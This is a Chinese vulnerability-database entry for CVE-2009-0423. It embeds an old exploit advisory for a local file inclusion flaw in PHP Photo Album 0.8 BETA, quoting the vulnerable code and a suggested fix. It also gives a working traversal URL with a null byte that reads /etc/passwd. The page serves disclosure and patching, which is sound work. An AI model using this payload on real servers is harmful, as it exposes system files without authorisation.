PHP Photo Album 'preview'参数本地文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117232 漏洞类型 路径遍历
发布时间 2009-01-14 更新时间 2009-02-05
CVE编号 CVE-2009-0423 CNNVD-ID CNNVD-200902-105
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7786
https://cxsecurity.com/issue/WLB-2009020129
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-105
|漏洞详情
PhpPhotoAlbum是一款开放源码的照片管理工具。PhpPhotoAlbum(PHPPA)0.8BETA中的index.php存在目录遍历漏洞。远程攻击者可以借助预览参数中的".."(参数中包含'..'),包含和运行任意的本地文件。
|漏洞EXP
[START]

###################################################################################################################################
[0x01] Informations:

Script         : Php Photo Album 0.8 BETA
Download       : http://sourceforge.net/project/downloading.php?group_id=151573&use_mirror=kent&filename=PHPPA_.9_BETA.zip&37834145
Vulnerability  : Local File Inclusion
Author         : Osirys
Contact        : osirys[at]live[dot]it
Website        : http://osirys.org
Notes          : Proud to be Italian


###################################################################################################################################
[0x02] Bug: [Local File Inclusion]
######

Bugged file is: /[path]/index.php

[CODE]

$skin_temp = $_GET['preview'];
if(isset($_GET['preview']) && file_exists("./skin/$skin_temp/config.php")){
	$skin = $_GET['preview'];
	}
else{
	$skin = vari("skin");
	}
require("./skin/$skin/config.php");

[/CODE]

If 'preview' from GET is provided, we can include it just bypassing a stupid cheek.
file_exists("./skin/$skin_temp/config.php) <-- this cheek is stupid, becouse when
we set a value to $skin_temp , if we set a local file with a directory trasversal
it's obvious that the file exists, so it will be included.

[!] FIX: Use another filter instead of file_exists("./skin/$skin_temp/config.php)
         Just filter $skin_temp before include it. A fix could be to declare $skin
         with a standard or local value, or just put the allowed values in an array,
         and cheek then if the skin provided is allowed. See is_in_array() function


[!] EXPLOIT: /[path]/index.php?preview=[local_file]%00
                                       ../../../../../../../../../../../../etc/passwd%00

###################################################################################################################################

[/END]

# milw0rm.com [2009-01-14]
|参考资料

来源:XF
名称:phpphotoalbum-index-file-include(48017)
链接:http://xforce.iss.net/xforce/xfdb/48017
来源:BID
名称:33277
链接:http://www.securityfocus.com/bid/33277
来源:MILW0RM
名称:7786
链接:http://www.milw0rm.com/exploits/7786